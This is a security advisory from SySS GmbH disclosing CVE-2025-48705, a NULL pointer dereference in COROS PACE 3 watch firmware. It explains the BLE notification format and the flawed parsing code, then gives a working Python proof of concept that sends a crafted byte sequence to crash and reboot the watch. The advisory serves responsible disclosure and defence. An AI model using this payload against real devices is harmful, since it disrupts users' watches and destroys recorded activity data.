-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-027
Product:                   COROS PACE 3
Manufacturer:              COROS Wearables, Inc.
Affected Version(s):       <= V 3.0808.0
Tested Version(s):         V 3.0808.0
Vulnerability Type:        NULL Pointer Dereference (CWE-476)
Risk Level:                Medium
Solution Status:           Not yet fixed
Manufacturer Notification: 2025-03-14
Solution Date:             N.A.
Public Disclosure:         2025-06-17
CVE Reference:             CVE-2025-48705
Author of Advisory:        Moritz Abrell, SySS GmbH
                           Jan Wütherich, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an 
even more powerful punch. Track your training and recovery with a watch 
that's lightweight and comfortable, with advanced technology, 
outstanding data accuracy, and backed by the industry-leading COROS 
training software system. The COROS PACE 3 paves the way to discover 
your potential."

Due to a NULL pointer dereference vulnerability, sending a specially
crafted Bluetooth Low Energy (BLE) message forces the device to reboot.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Connecting to the COROS PACE 3 and writing, e.g., the byte sequence
"0x7900ff00002e" to the characteristic with the UUID
"6e400002-b5a3-f393-e0a9-77757c7f7f70" forces the watch to reboot.
If exploited during an ongoing activity, it leads to the termination 
of the activity itself and the loss of the recorded data.

Packets beginning with 0x79 are for notifications and use the 
following basic structure:

    0      8         24        n
    +--------------------------+
    | 0x79 | Unknown | Payload |
    +--------------------------+

The payload is copied to the heap and parsed. 
It contains three different lines for the notification (L0, L1 and L2):

     4        12         n         4        12         n         4        12         n     
+-----------------------------------------------------------------------------------------+
| L0 type | L0 size | L0 data | L1 type | L1 size | L1 data | L2 type | L2 size | L2 data |
+-----------------------------------------------------------------------------------------+

A typical message would look as follows:

  4   12         n         4   12      n      4   12          n     
+----------------------------------------------------------------------+
| 0 | 00C | com.whatsapp | 1 | 006 | HACKED | 2 | 011 | Hacked by SySS |
+----------------------------------------------------------------------+
    
Each line type corresponds to its line number. 
Type 0 for the first line, type 1 for the second, and type 2 for
the third.
If the L1 data content starts with a null terminator, the L0 data, 
without the com. prefix, is copied to its place.
The code for this looks similar to the following:

    if (*l1_data == '\0') {
        char* name = strrchr(l0_data, '.');
        memcpy(l1_data, name + 1, strlen(name));
    }

Modifying the L1 type to 2 instead of 1 causes L1 to be skipped, 
thus setting l1_data to NULL.
Since the above code will still be executed, a NULL pointer will
be dereferenced, causing a crash.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following proof-of-concept script connects to a COROS PACE 3
and triggers the denial-of-service vulnerability:

####################
import asyncio
from bleak import BleakClient
import sys

DEVICE_ADDRESS = "F7:AF:1D:27:03:b0"
CHARACTERISTIC_UUID = "6e400002b5a3f393e0a977757c7f7f70"
DATA = bytes.fromhex("7900ff00002e")


async def write_to_ble_device():
    client = BleakClient(DEVICE_ADDRESS)
    try:
        await client.connect()
        await asyncio.sleep(2)  
        if client.is_connected:
            print(f"connected to {DEVICE_ADDRESS}")
            await client.write_gatt_char(CHARACTERISTIC_UUID, DATA, response=False)
    except Exception as e:
        print(f"Error: {e}")
    finally:
        if client.is_connected:
            await client.disconnect()

asyncio.run(write_to_ble_device())
####################

# Executing the script results in a reboot of the watch: 
    $ python3 poc.py

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Not yet fixed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Asked once again for an update
2025-04-15: Answer received from the manufacturer; manufacturer informed
            SySS GmbH that a fix is planned for June, 2025
2025-04-15: Receipt confirmed
2025-05-26: More detailed information provided to the manufacturer
2025-05-26: Manufacturer confirmed receipt
2025-06-17: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-027
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-027.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2025-48705
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-48705
[5] Detailed blog post:
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell and Jan Wütherich 
of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmhQEfUACgkQrgyb+PE0
i1N+ghAAmtDvnj58r3KGE+mThlbcfNOe7TARNyesVts93EC7Udtt2uxHGoT9b1qb
/oIQfSR7z1bCSZNGi9RBXmCzrK97rcQS6xaUa74wyO0wQiAIfMURWCg1qE3ZHTEb
/T04KvzqlsJ9cWO/AN7/jG6v9LuUoUarwhbzXno3w5GCZ3ZqkD1B9ud3DpCVP+Fo
ousLsACKAC+BEkwKwDTGvRojBqBsLhPLQedRdKC8RAxE7T/i4PqCVAt0l1yvpyAl
XAN4Z10XoFbOIR2yTVTgy74vodhjZAsWf3WHotH+0RvDV1BOxfcfgeP6ooBibKs8
Sky3tGCjQTPX9EfTHchvJxPHFZCA1ycEcrFLgZEP644yYZkAA5/BLIIAmoyAVgjL
MslY8i2zsEp9PdGmWadPIy6bcqH6wIH9ZgHrsjwaSMIaxetOguQH43sXoWrNRRou
36CLexHK0ZitxHw4NnyvlTeGYtTZxFk21o/agkJVTGSvQBm5qN+0pdybbNrWif5J
3qrGBatIXqC5X+t5IjuPYEaCSRzr5mUlYUq8xLq2qf1cYHUHtZCGAxg8UlU83xl7
SvcyY06R9GkLmGqsmpsBPxlChBoTbAmGSM7jS87yT/E1raKa5sqmP0uC7cYe/QoL
bj0l8gLOpEtu5pzX1GZ24InIrw3CqeOy5o5ybeDjjrWFJiTO8l8=
=/Oux
-----END PGP SIGNATURE-----